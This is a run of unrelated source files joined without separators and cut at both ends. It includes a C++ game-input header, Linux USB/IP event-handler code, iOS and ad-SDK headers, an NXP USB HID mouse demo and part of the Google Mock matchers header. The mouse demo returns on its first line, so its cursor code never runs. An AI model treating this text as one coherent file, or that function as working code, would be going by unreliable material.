lose exclusive control of the device osiGamePad(); ~osiGamePad(); void delData(); // internals from here on private: osiJoystick *_j; // linked Joystick class void _log(const osiButLog &); // [internal] just puts the last button in the last button-history (it logs imediatly when a button is down) uint8_t _buffer1[MAX_JOYSTICK_BUTTONS], _buffer2[MAX_JOYSTICK_BUTTONS]; // used for the key / lastCheck. buffers are swapped with pointers, so no copying is involved inline void _swapBuffers(); #ifdef OS_MAC //friend void HIDchange(void *, IOReturn, void *, IOHIDValueRef); #endif }; // --------------============= GAMEWHEEL CLASS ============-------------- ///====================================================================== class osiGameWheel { friend class osiInput; friend class osiJoystick; public: // CONFIGURATION int16_t mode; // [MODE0]: disabled, can check against this // [MODE1]: OS native // [MODE2]: win(directinput) / linux(n/a) / mac(n/a) // [MODE3]: win(xinput) / linux(n/a) / mac(n/a) str8 name; // wheel name (product name) int16_t maxButtons; // nr of buttons the gameWheel has // AXIS int32_t wheel; // [-32767 0 +32767] the wheel int32_t a1, a2, a3, a4, a5; // [-32767 0 +32767] different axis (more work must be done here, i think) // a pov?? // THIS NEEDS MORE WORK <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< // BUTTONS state / history uint8_t *but; // buttons state uint8_t *butPrev; // holds previous buttons state int32_t butPressure[MAX_JOYSTICK_BUTTONS];// [0 +65534] button pressure (how hard a button is pressed) buttons 20-23 are pressure on the pov uint64_t butTime[MAX_JOYSTICK_BUTTONS]; // time @ key started to be pressed osiButLog butLog[MAX_KEYS_LOGGED]; // history of pressed buttons // functions bool activate() { return _j->activate(); } // !! activates wheel, signaling to update it's data values & grabbing exclusive usage bool deactivate() { return _j->deactivate(); } // deactivates & ungrabs device void resetButtons(); // clears all button buffers & resets history (used in case of alt-tab or something similar) void resetAxis(); // resets all gamewheel axis to 0 / null position void update() { _j->update(); } // updates internal vals; calling Input::update() is better, but each stick can be updated manually bool grab() { return _j->grab(); } // exclusive control of the device (if possible) bool ungrab() { return _j->ungrab(); }// lose exclusive control of the device osiGameWheel(); ~osiGameWheel(); void delData(); private: osiJoystick *_j; // linked Joystick class uint8_t _buffer1[MAX_JOYSTICK_BUTTONS], _buffer2[MAX_JOYSTICK_BUTTONS]; // used for the key / lastCheck. buffers are swapped with pointers, so no copying is involved void _log(const osiButLog &); // [internal] puts the last button in the last button-history (it logs imediatly when a button is down) inline void _swapBuffers(); #ifdef OS_MAC //friend void _HIDchange(void *, IOReturn, void *, IOHIDValueRef); #endif }; // -these are key codes; they are updated with _Kv.populate()- it is auto-called in in.populate() // -they are OS independant, and if the user switches a keyboard/ system changes keyboard locals // another call to in.populate() should update the key code vals - THESE CODES ARE THE SAME ON EVERY KEYBOARD ON EARTHl // SO THIS IS NOT TRUE (i think) - problem is that a few keys might be on a different FIZICAL position (european keyboards usually) // -v comes from 'variable' // -only the most inportant keyboard keys are in this struct. // (there is no 'play' button on some crappy keyboard manufacturer) // -on some keyboards, SOME of these keys MIGHT NOT EXIST!!!! struct _Kv { uint8_t esc, enter, kpenter, tab, space, backspace, insert, del, home, end, pgup, pgdown, rshift, lshift, rctrl, lctrl, ralt, lalt, f1, f2, f3, f4, f5, f6, f7, f8, f9, f10, f11, f12, left, up, right, down, prtsc, pause, capslock, scrolllock, numlock, q, w, e, r, t, y, u, i, o, p, a, s, d, f, g, h, j, k, l, z, x, c, v, b, n, m, n1, n2, n3, n4, n5, n6, n7, n8, n9, n0, kp1, kp2, kp3, kp4, kp5, kp6, kp7, kp8, kp9, kp0, minus, equal, backslash, lbracket, rbracket, semicolon, apostrophe, // should apostrophe be quote? comma, dot, slash, grave, kpslash, kpmultiply, kpminus, kpplus, kpequal, kpdel, // dot= period lOS, rOS, menu; /// left win key, right win key, propreties key void populate(); /// updates all these vars. SOURCE CODE IN "OSchar.cpp" }; // ================================================================== // // --------------============= INPUT CLASS ============-------------- // // ================================================================== // class osiInput { public: osiMouse m; // the main mouse class osiKeyboard k; // the main keyboard class osiJoystick j[MAX_JOYSTICKS]; // j[0-7]= OS driver; j[8-15] XINPUT; j[16-19] DIRECT INPUT osiGamePad gp[MAX_JOYSTICKS]; // gp[0-7]= OS driver; gp[8-15] XINPUT; gp[16-19] DIRECT INPUT osiGameWheel gw[MAX_JOYSTICKS]; // gw[0-7]= OS driver; gw[8-15] XINPUT; gw[16-19] DIRECT INPUT _Kv Kv; // struct with most inportant keycodes: in.k.key[Kv.space] is possible. OS independant/ if keyboard is changed in any way, just call Kv.populate() // each driver type name (EX: j[0].mode==1 -> system default driver j[8].mode== 2 -> Direct Input handled) str8 mode1Name; // under all systems, this is 'System Handled' or 'System Default' <<<<<<<<<<<<<<<<<<< CHOSE A GOOD NAME str8 mode2Name; // under windows, this should be 'DirectInput', under the others 'Not Used' str8 mode3Name; // under windows, this should be 'XInput', under the others 'Not Used' struct InputNumbers { int16_t jFound; // nr of joysticks found on system in total (for win, os+directinput+xinput) int16_t gpFound; // nr of gamepads found on system int16_t gwFound; // nr of gamewheels found on system int16_t jOS; // (max 8) nr of normal driver joysticks found int16_t gpOS; // (max 8) nr of normal driver joysticks found int16_t gwOS; // (max 8) nr of normal driver joysticks found int16_t jT2; // (max 8) nr of directinput joysticks found (nothing in linux/mac, but the code will compile) int16_t gpT2; // (max 8) nr of directinput gamepads found (nothing in linux/mac, but the code will compile) int16_t gwT2; // (max 8) nr of directinput gamewheels found (nothing in linux/mac, but the code will compile) int16_t jT3; // (max 4) nr of xinput joysticks found (nothing in linux/mac, but the code will compile) int16_t gpT3; // (max 4) nr of xinput gamepads found (nothing in linux/mac, but the code will compile) int16_t gwT3; // (max 4) nr of xinput gamewheels found (nothing in linux/mac, but the code will compile) } nr; // all different numbers of HID found inline osiJoystick *getT2j (int16_t nr) { return &j[8+ nr]; } // [win type2 = direct input] [linux= nothig] [mac= nothig] inline osiGamePad *getT2gp(int16_t nr) { return &gp[8+ nr]; } // [win type2 = direct input] [linux= nothig] [mac= nothig] inline osiGameWheel *getT2gw(int16_t nr) { return &gw[8+ nr]; } // [win type2 = direct input] [linux= nothig] [mac= nothig] inline osiJoystick *getT3j (int16_t nr) { return &j[16+ nr]; } // [win type3= xinput] [linux= nothig] [mac= nothig] inline osiGamePad *getT3gp(int16_t nr) { return &gp[16+ nr]; } // [win type3= xinput] [linux= nothig] [mac= nothig] inline osiGameWheel *getT3gw(int16_t nr) { return &gw[16+ nr]; } // [win type3= xinput] [linux= nothig] [mac= nothig] // functions bool init(int mMode= 1, int kMode= 1); // must be called after a main window is created (see 'mode' variable for mouse & keyboard for more customization) void populate(bool scanMouseKeyboard= false); // searches for joysticks / other HIDs void update(); // update everything (mouse& keyboard& sticks& pads& wheels) void resetPressedButtons(); // in case of ALT-TAB, all buttons/timers must be reset, to avoid bugs!!! void resetAxis(); // resets all HID axis (sticks/pads/wheels) osiInput(); ~osiInput(); void delData(); // private (internal) stuff from here on private: friend class osinteraction; friend class osiMouse; friend class osiKeyboard; uint64_t _lastPopulate; #ifdef OS_WIN #ifdef USING_DIRECTINPUT friend BOOL CALLBACK _diDevCallback(LPCDIDEVICEINSTANCE, LPVOID); void *_dInput; #endif #endif /// OS_WIN #ifdef OS_LINUX // linux keysyms handling (keysyms make windows look good ffs) // these funcs are in <OSchar.cpp>, at the end of the file !!!!!!!!!!!!! void _keysym2unicode(KeySym *, uint32_t *ret); // converts keysym to unicode (no checks, use getUnicode) void _getUnicode(KeySym *, uint32_t *ret); // converts keysym to unicode, verifies that the character is valid #endif /// OS_LINUX #ifdef OS_MAC // MAC MESS <<<--------------- NOTHING TO BOTHER HERE ------ // nothing to bother here, all internal vars void *_manager; // [internal] 'manager' that handles all HID devices (this one is set to handle sticks/pads/wheels only) #endif // END MAC MESS <<<----------------------------------------------- // TESTING void vibrate(); // TESTING ^^^^^^^^ }; extern osiInput in; // only 1 global class #define mPos(_x, _y, _dx, _dy) ((in.m.x>= (_x)) && (in.m.x<= ((_x)+ (_dx))) && (in.m.y>= (_y)) && (in.m.y<= ((_y)+ (_dy))))
// SPDX-License-Identifier: GPL-2.0+ /* * Copyright (C) 2003-2008 Takahiro Hirofuchi * Copyright (C) 2015 Nobuo Iwata */ #include <linux/kthread.h> #include <linux/export.h> #include <linux/slab.h> #include <linux/workqueue.h> #include "usbip_common.h" struct usbip_event { struct list_head node; struct usbip_device *ud; }; static DEFINE_SPINLOCK(event_lock); static LIST_HEAD(event_list); static void set_event(struct usbip_device *ud, unsigned long event) { unsigned long flags; spin_lock_irqsave(&ud->lock, flags); ud->event |= event; spin_unlock_irqrestore(&ud->lock, flags); } static void unset_event(struct usbip_device *ud, unsigned long event) { unsigned long flags; spin_lock_irqsave(&ud->lock, flags); ud->event &= ~event; spin_unlock_irqrestore(&ud->lock, flags); } static struct usbip_device *get_event(void) { struct usbip_event *ue = NULL; struct usbip_device *ud = NULL; unsigned long flags; spin_lock_irqsave(&event_lock, flags); if (!list_empty(&event_list)) { ue = list_first_entry(&event_list, struct usbip_event, node); list_del(&ue->node); } spin_unlock_irqrestore(&event_lock, flags); if (ue) { ud = ue->ud; kfree(ue); } return ud; } static struct task_struct *worker_context; static void event_handler(struct work_struct *work) { struct usbip_device *ud; if (worker_context == NULL) { worker_context = current; } while ((ud = get_event()) != NULL) { usbip_dbg_eh("pending event %lx\n", ud->event); mutex_lock(&ud->sysfs_lock); /* * NOTE: shutdown must come first. * Shutdown the device. */ if (ud->event & USBIP_EH_SHUTDOWN) { ud->eh_ops.shutdown(ud); unset_event(ud, USBIP_EH_SHUTDOWN); } /* Reset the device. */ if (ud->event & USBIP_EH_RESET) { ud->eh_ops.reset(ud); unset_event(ud, USBIP_EH_RESET); } /* Mark the device as unusable. */ if (ud->event & USBIP_EH_UNUSABLE) { ud->eh_ops.unusable(ud); unset_event(ud, USBIP_EH_UNUSABLE); } mutex_unlock(&ud->sysfs_lock); wake_up(&ud->eh_waitq); } } int usbip_start_eh(struct usbip_device *ud) { init_waitqueue_head(&ud->eh_waitq); ud->event = 0; return 0; } EXPORT_SYMBOL_GPL(usbip_start_eh); void usbip_stop_eh(struct usbip_device *ud) { unsigned long pending = ud->event & ~USBIP_EH_BYE; if (!(ud->event & USBIP_EH_BYE)) usbip_dbg_eh("usbip_eh stopping but not removed\n"); if (pending) usbip_dbg_eh("usbip_eh waiting completion %lx\n", pending); wait_event_interruptible(ud->eh_waitq, !(ud->event & ~USBIP_EH_BYE)); usbip_dbg_eh("usbip_eh has stopped\n"); } EXPORT_SYMBOL_GPL(usbip_stop_eh); #define WORK_QUEUE_NAME "usbip_event" static struct workqueue_struct *usbip_queue; static DECLARE_WORK(usbip_work, event_handler); int usbip_init_eh(void) { usbip_queue = create_singlethread_workqueue(WORK_QUEUE_NAME); if (usbip_queue == NULL) { pr_err("failed to create usbip_event\n"); return -ENOMEM; } return 0; } void usbip_finish_eh(void) { flush_workqueue(usbip_queue); destroy_workqueue(usbip_queue); usbip_queue = NULL; } void usbip_event_add(struct usbip_device *ud, unsigned long event) { struct usbip_event *ue; unsigned long flags; if (ud->event & USBIP_EH_BYE) return; set_event(ud, event); spin_lock_irqsave(&event_lock, flags); list_for_each_entry_reverse(ue, &event_list, node) { if (ue->ud == ud) goto out; } ue = kmalloc(sizeof(struct usbip_event), GFP_ATOMIC); if (ue == NULL) goto out; ue->ud = ud; list_add_tail(&ue->node, &event_list); queue_work(usbip_queue, &usbip_work); out: spin_unlock_irqrestore(&event_lock, flags); } EXPORT_SYMBOL_GPL(usbip_event_add); int usbip_event_happened(struct usbip_device *ud) { int happened = 0; unsigned long flags; spin_lock_irqsave(&ud->lock, flags); if (ud->event != 0) happened = 1; spin_unlock_irqrestore(&ud->lock, flags); return happened; } EXPORT_SYMBOL_GPL(usbip_event_happened); int usbip_in_eh(struct task_struct *task) { if (task == worker_context) return 1; return 0; } EXPORT_SYMBOL_GPL(usbip_in_eh);
// // ImageProcessingProtocol.h // Tesseract BizScanner // // Created by Abhilash S T P on 4/4/14. // Copyright (c) 2014 Abhilash S T P. All rights reserved. // #import <Foundation/Foundation.h> @protocol ImageProcessingProtocol <NSObject> - (UIImage*) processImage:(UIImage*) src; - (NSString*) pathToLangugeFIle; - (UIImage*) processRotation:(UIImage*)src; - (UIImage*) processHistogram:(UIImage*)src; - (UIImage*) processFilter:(UIImage*)src; - (UIImage*) processBinarize:(UIImage*)src; - (void) contoursImage:(UIImage *)src; @end
// // AdMoGoInterstitialManager.h // AdsMogo // // Created by Daxiong on 14-4-28. // // #import "AdMoGoInterstitial.h" #import <Foundation/Foundation.h> @interface AdMoGoInterstitialManager : NSObject + (void)setAppKey:(NSString *)key; + (void)setRootViewController:(UIViewController *)rvc; + (void)setDefaultDelegate:(id)delegate; + (AdMoGoInterstitialManager *)shareInstance; - (void)initDefaultInterstitial; - (AdMoGoInterstitial *)defaultInterstitial; - (AdMoGoInterstitial *)adMogoInterstitialByAppKey:(NSString *)appKey; - (AdMoGoInterstitial *)adMogoVideoInterstitialByAppKey:(NSString *)appKey; - (AdMoGoInterstitial *)adMogoInterstitialByAppKey:(NSString *)appKey isManualRefresh:(BOOL)isManualRefresh; - (AdMoGoInterstitial *)adMogoVideoInterstitialByAppKey:(NSString *)appKey isManualRefresh:(BOOL)isManualRefresh; - (void)removeInterstitialInstance; - (void)removeInterstitialInstanceByAppKey:(NSString *)key; - (void)removeVideoInterstitialInstanceByAppKey:(NSString *)key; - (void)removeAllInterstitialInstance; /*----------------------------------*/ // //以下方法是对全屏广告实例的封装,直接操作 “default” Interstitial对象 //当然也可以通过- (AdMoGoInterstitial *)adMogoInterstitialByAppKey:(NSString *)appKey获得对应key的对象直接操作 // //注:通过+ (void)setAppKey:(NSString *)key方法设置设置的key对应的对象 //将被视为“default” Interstitial对象 // /*----------------------------------*/ /** *进入展示时机 *isWait:如果没有广告展示是否等待 */ - (void)interstitialShow:(BOOL)isWait; /** *离开展示时机 */ - (void)interstitialCancel; @end
/* * This header is generated by classdump-dyld 1.0 * on Sunday, June 7, 2020 at 11:23:47 AM Mountain Standard Time * Operating System: Version 13.4.5 (Build 17L562) * Image Source: /System/Library/Frameworks/MapKit.framework/MapKit * classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. */ @protocol MKETAProviderObserver <NSObject> @optional -(void)ETAProviderUpdated:(id)arg1; -(void)ETAProviderLocationUpdated:(id)arg1; @end
/* * The Clear BSD License * Copyright (c) 2015, Freescale Semiconductor, Inc. * Copyright 2016 NXP * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted (subject to the limitations in the disclaimer below) provided * that the following conditions are met: * * o Redistributions of source code must retain the above copyright notice, this list * of conditions and the following disclaimer. * * o Redistributions in binary form must reproduce the above copyright notice, this * list of conditions and the following disclaimer in the documentation and/or * other materials provided with the distribution. * * o Neither the name of the copyright holder nor the names of its * contributors may be used to endorse or promote products derived from this * software without specific prior written permission. * * NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "usb_device_config.h" #include "usb.h" #include "usb_device.h" #include "usb_device_class.h" #include "usb_device_hid.h" #include "usb_device_ch9.h" #include "usb_device_descriptor.h" #include "composite.h" #include "hid_mouse.h" /******************************************************************************* * Definitions ******************************************************************************/ /******************************************************************************* * Prototypes ******************************************************************************/ static usb_status_t USB_DeviceHidMouseAction(void); /******************************************************************************* * Variables ******************************************************************************/ USB_DMA_NONINIT_DATA_ALIGN(USB_DATA_ALIGN_SIZE) static uint8_t s_MouseBuffer[USB_HID_MOUSE_REPORT_LENGTH]; static usb_device_composite_struct_t *s_UsbDeviceComposite; static usb_device_hid_mouse_struct_t s_UsbDeviceHidMouse; /******************************************************************************* * Code ******************************************************************************/ /* Update mouse pointer location. Draw a rectangular rotation*/ static usb_status_t USB_DeviceHidMouseAction(void) { return kStatus_USB_Success; static int8_t x = 0U; static int8_t y = 0U; enum { RIGHT, DOWN, LEFT, UP }; static uint8_t dir = RIGHT; switch (dir) { case RIGHT: /* Move right. Increase X value. */ s_UsbDeviceHidMouse.buffer[1] = 1U; s_UsbDeviceHidMouse.buffer[2] = 0U; x++; if (x > 99U) { dir++; } break; case DOWN: /* Move down. Increase Y value. */ s_UsbDeviceHidMouse.buffer[1] = 0U; s_UsbDeviceHidMouse.buffer[2] = 1U; y++; if (y > 99U) { dir++; } break; case LEFT: /* Move left. Discrease X value. */ s_UsbDeviceHidMouse.buffer[1] = (uint8_t)(0xFFU); s_UsbDeviceHidMouse.buffer[2] = 0U; x--; if (x < 1U) { dir++; } break; case UP: /* Move up. Discrease Y value. */ s_UsbDeviceHidMouse.buffer[1] = 0U; s_UsbDeviceHidMouse.buffer[2] = (uint8_t)(0xFFU); y--; if (y < 1U) { dir = RIGHT; } break; default: break; } return USB_DeviceHidSend(s_UsbDeviceComposite->hidMouseHandle, USB_HID_MOUSE_ENDPOINT_IN, s_UsbDeviceHidMouse.buffer, USB_HID_MOUSE_REPORT_LENGTH); } /* The device HID class callback */ usb_status_t USB_DeviceHidMouseCallback(class_handle_t handle, uint32_t event, void *param) { usb_status_t error = kStatus_USB_Error; switch (event) { case kUSB_DeviceHidEventSendResponse: if (s_UsbDeviceComposite->attach) { return USB_DeviceHidMouseAction(); } break; case kUSB_DeviceHidEventGetReport: case kUSB_DeviceHidEventSetReport: case kUSB_DeviceHidEventRequestReportBuffer: error = kStatus_USB_InvalidRequest; break; case kUSB_DeviceHidEventGetIdle: case kUSB_DeviceHidEventGetProtocol: case kUSB_DeviceHidEventSetIdle: case kUSB_DeviceHidEventSetProtocol: break; default: break; } return error; } /* The device callback */ usb_status_t USB_DeviceHidMouseSetConfigure(class_handle_t handle, uint8_t configure) { if (USB_COMPOSITE_CONFIGURE_INDEX == configure) { return USB_DeviceHidMouseAction(); /* run the cursor movement code */ } return kStatus_USB_Error; } /* Set interface */ usb_status_t USB_DeviceHidMouseSetInterface(class_handle_t handle, uint8_t interface, uint8_t alternateSetting) { if (USB_HID_KEYBOARD_INTERFACE_INDEX == interface) { return USB_DeviceHidMouseAction(); /* run the cursor movement code */ } return kStatus_USB_Error; } /* Initialize the HID mouse */ usb_status_t USB_DeviceHidMouseInit(usb_device_composite_struct_t *deviceComposite) { s_UsbDeviceComposite = deviceComposite; s_UsbDeviceHidMouse.buffer = s_MouseBuffer; return kStatus_USB_Success; }
// Copyright 2007, Google Inc. // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following disclaimer // in the documentation and/or other materials provided with the // distribution. // * Neither the name of Google Inc. nor the names of its // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Author: wan@google.com (Zhanyong Wan) // Google Mock - a framework for writing C++ mock classes. // // This file implements some commonly used argument matchers. More // matchers can be defined by the user implementing the // MatcherInterface<T> interface if necessary. #ifndef GMOCK_INCLUDE_GMOCK_GMOCK_MATCHERS_H_ #define GMOCK_INCLUDE_GMOCK_GMOCK_MATCHERS_H_ #include <math.h> #include <algorithm> #include <iterator> #include <limits> #include <ostream> // NOLINT #include <sstream> #include <string> #include <utility> #include <vector> #include "gmock/internal/gmock-internal-utils.h" #include "gmock/internal/gmock-port.h" #include "gtest/gtest.h" #if GTEST_HAS_STD_INITIALIZER_LIST_ # include <initializer_list> // NOLINT -- must be after gtest.h #endif namespace testing { // To implement a matcher Foo for type T, define: // 1. a class FooMatcherImpl that implements the // MatcherInterface<T> interface, and // 2. a factory function that creates a Matcher<T> object from a // FooMatcherImpl*. // // The two-level delegation design makes it possible to allow a user // to write "v" instead of "Eq(v)" where a Matcher is expected, which // is impossible if we pass matchers by pointers. It also eases // ownership management as Matcher objects can now be copied like // plain values. // MatchResultListener is an abstract class. Its << operator can be // used by a matcher to explain why a value matches or doesn't match. // // TODO(wan@google.com): add method // bool InterestedInWhy(bool result) const; // to indicate whether the listener is interested in why the match // result is 'result'. class MatchResultListener { public: // Creates a listener object with the given underlying ostream. The // listener does not own the ostream, and does not dereference it // in the constructor or destructor. explicit MatchResultListener(::std::ostream* os) : stream_(os) {} virtual ~MatchResultListener() = 0; // Makes this class abstract. // Streams x to the underlying ostream; does nothing if the ostream // is NULL. template <typename T> MatchResultListener& operator<<(const T& x) { if (stream_ != NULL) *stream_ << x; return *this; } // Returns the underlying ostream. ::std::ostream* stream() { return stream_; } // Returns true iff the listener is interested in an explanation of // the match result. A matcher's MatchAndExplain() method can use // this information to avoid generating the explanation when no one // intends to hear it. bool IsInterested() const { return stream_ != NULL; } private: ::std::ostream* const stream_; GTEST_DISALLOW_COPY_AND_ASSIGN_(MatchResultListener); }; inline MatchResultListener::~MatchResultListener() { } // An instance of a subclass of this knows how to describe itself as a // matcher. class MatcherDescriberInterface { public: virtual ~MatcherDescriberInterface() {} // Describes this matcher to an ostream. The function should print // a verb phrase that describes the property a value matching this // matcher should have. The subject of the verb phrase is the value // being matched. For example, the DescribeTo() method of the Gt(7) // matcher prints "is greater than 7". virtual void DescribeTo(::std::ostream* os) const = 0; // Describes the negation of this matcher to an ostream. For // example, if the description of this matcher is "is greater than // 7", the negated description could be "is not greater than 7". // You are not required to override this when implementing // MatcherInterface, but it is highly advised so that your matcher // can produce good error messages. virtual void DescribeNegationTo(::std::ostream* os) const { *os << "not ("; DescribeTo(os); *os << ")"; } }; // The implementation of a matcher. template <typename T> class MatcherInterface : public MatcherDescriberInterface { public: // Returns true iff the matcher matches x; also explains the match // result to 'listener' if necessary (see the next paragraph), in // the form of a non-restrictive relative clause ("which ...", // "whose ...", etc) that describes x. For example, the // MatchAndExplain() method of the Pointee(...) matcher should // generate an explanation like "which points to ...". // // Implementations of MatchAndExplain() should add an explanation of // the match result *if and only if* they can provide additional // information that's not already present (or not obvious) in the // print-out of x and the matcher's description. Whether the match // succeeds is not a factor in deciding whether an explanation is // needed, as sometimes the caller needs to print a failure message // when the match succeeds (e.g. when the matcher is used inside // Not()). // // For example, a "has at least 10 elements" matcher should explain // what the actual element count is, regardless of the match result, // as it is useful information to the reader; on the other hand, an // "is empty" matcher probably only needs to explain what the actual // size is when the match fails, as it's redundant to say that the // size is 0 when the value is already known to be empty. // // You should override this method when defining a new matcher. // // It's the responsibility of the caller (Google Mock) to guarantee // that 'listener' is not NULL. This helps to simplify a matcher's // implementation when it doesn't care about the performance, as it // can talk to 'listener' without checking its validity first. // However, in order to implement dummy listeners efficiently, // listener->stream() may be NULL. virtual bool MatchAndExplain(T x, MatchResultListener* listener) const = 0; // Inherits these methods from MatcherDescriberInterface: // virtual void DescribeTo(::std::ostream* os) const = 0; // virtual void DescribeNegationTo(::std::ostream* os) const; }; // A match result listener that stores the explanation in a string. class StringMatchResultListener : public MatchResultListener { public: StringMatchResultListener() : MatchResultListener(&ss_) {} // Returns the explanation accumulated so far. internal::string str() const { return ss_.str(); } // Clears the explanation accumulated so far. void Clear() { ss_.str(""); } private: ::std::stringstream ss_; GTEST_DISALLOW_COPY_AND_ASSIGN_(StringMatchResultListener); }; namespace internal { // A match result listener that ignores the explanation. class DummyMatchResultListener : public MatchResultListener { public: DummyMatchResultListener() : MatchResultListener(NULL) {} private: GTEST_DISALLOW_COPY_AND_ASSIGN_(DummyMatchResultListener); }; // A match result listener that forwards the explanation to a given // ostream. The difference between this and MatchResultListener is // that the former is concrete. class StreamMatchResultListener : public MatchResultListener { public: explicit StreamMatchResultListener(::std::ostream* os) : MatchResultListener(os) {} private: GTEST_DISALLOW_COPY_AND_ASSIGN_(StreamMatchResultListener); }; // An internal class for implementing Matcher<T>, which will derive // from it. We put functionalities common to all Matcher<T> // specializations here to avoid code duplication. template <typename T> class MatcherBase { public: // Returns true iff the matcher matches x; also explains the match // result to 'listener'. bool MatchAndExplain(T x, MatchResultListener* listener) const { return impl_->MatchAndExplain(x, listener); } // Returns true iff this matcher matches x. bool Matches(T x) const { DummyMatchResultListener dummy; return MatchAndExplain(x, &dummy); } // Describes this matcher to an ostream. void DescribeTo(::std::ostream* os) const { impl_->DescribeTo(os); } // Describes the negation of this matcher to an ostream. void DescribeNegationTo(::std::ostream* os) const { impl_->DescribeNegationTo(os); } // Explains why x matches, or doesn't match, the matcher. void ExplainMatchResultTo(T x, ::std::ostream* os) const { StreamMatchResultListener listener(os); MatchAndExplain(x, &listener); } // Returns the describer for this matcher object; retains ownership // of the describer, which is only guaranteed to be alive when // this matcher object is alive. const MatcherDescriberInterface* GetDescriber() const { return impl_.get(); } protected: MatcherBase() {} // Constructs a matcher from its implementation. explicit MatcherBase(const MatcherInterface<T>* impl) : impl_(impl) {} virtual ~MatcherBase() {} private: // shared_ptr (util/gtl/shared_ptr.h) and linked_ptr have similar // interfaces. The former dynamically allocates a chunk of memory // to hold the reference count, while the latter tracks all // references using a circular linked list without allocating // memory. It has been observed that linked_ptr performs better in // typical scenarios. However, shared_ptr can out-perform // linked_ptr when there are many more uses of the copy constructor // than the default constructor. // // If performance becomes a problem, we should see if using // shared_ptr helps. ::testing::internal::linked_ptr<const MatcherInterface<T> > impl_; }; } // namespace internal // A Matcher<T> is a copyable and IMMUTABLE (except by assignment) // object that can check whether a value of type T matches. The // implementation of Matcher<T> is just a linked_ptr to const // MatcherInterface<T>, so copying is fairly cheap. Don't inherit // from Matcher! template <typename T> class Matcher : public internal::MatcherBase<T> { public: // Constructs a null matcher. Needed for storing Matcher objects in STL // containers. A default-constructed matcher is not yet initialized. You // cannot use it until a valid value has been assigned to it. Matcher() {} // Constructs a matcher from its implementation. explicit Matcher(const MatcherInterface<T>* impl) : internal::MatcherBase<T>(impl) {} // Implicit constructor here allows people to write // EXPECT_CALL(foo, Bar(5)) instead of EXPECT_CALL(foo, Bar(Eq(5))) sometimes Matcher(T value); // NOLINT }; // The following two specializations allow the user to write str // instead of Eq(str) and "foo" instead of Eq("foo") when a string // matcher is expected. template <> class GTEST_API_ Matcher<const internal::string&> : public internal::MatcherBase<const internal::string&> { public: Matcher() {} explicit Matcher(const MatcherInterface<const internal::string&>* impl) : internal::MatcherBase<const internal::string&>(impl) {} // Allows the user to write str instead of Eq(str) sometimes, where // str is a string object. Matcher(const internal::string& s); // NOLINT // Allows the user to write "foo" instead of Eq("foo") sometimes. Matcher(const char* s); // NOLINT }; template <> class GTEST_API_ Matcher<internal::string> : public internal::MatcherBase<internal::string> { public: Matcher() {} explicit Matcher(const MatcherInterface<internal::string>* impl) : internal::MatcherBase<internal::string>(impl) {} // Allows the user to write str instead of Eq(str) sometimes, where // str is a string object. Matcher(const internal::string& s); // NOLINT // Allows the user to write "foo" instead of Eq("foo") sometimes. Matcher(const char* s); // NOLINT }; #if GTEST_HAS_STRING_PIECE_ // The following two specializations allow the user to write str // instead of Eq(str) and "foo" instead of Eq("foo") when a StringPiece // matcher is expected. template <> class GTEST_API_ Matcher<const StringPiece&> : public internal::MatcherBase<const StringPiece&> { public: Matcher() {} explicit Matcher(const MatcherInterface<const StringPiece&>* impl) : internal::MatcherBase<const StringPiece&>(impl) {} // Allows the user to write str instead of Eq(str) sometimes, where // str is a string object. Matcher(const internal::string& s); // NOLINT // Allows the user to write "foo" instead of Eq("foo") sometimes. Matcher(const char* s); // NOLINT // Allows the user to pass StringPieces directly. Matcher(StringPiece s); // NOLINT }; template <> class GTEST_API_ Matcher<StringPiece> : public internal::MatcherBase<StringPiece> { public: Matcher() {} explicit Matcher(const MatcherInterface<StringPiece>* impl) : internal::MatcherBase<StringPiece>(impl) {} // Allows the user to write str instead of Eq(str) sometimes, where // str is a string object. Matcher(const internal::string& s); // NOLINT // Allows the user to write "foo" instead of 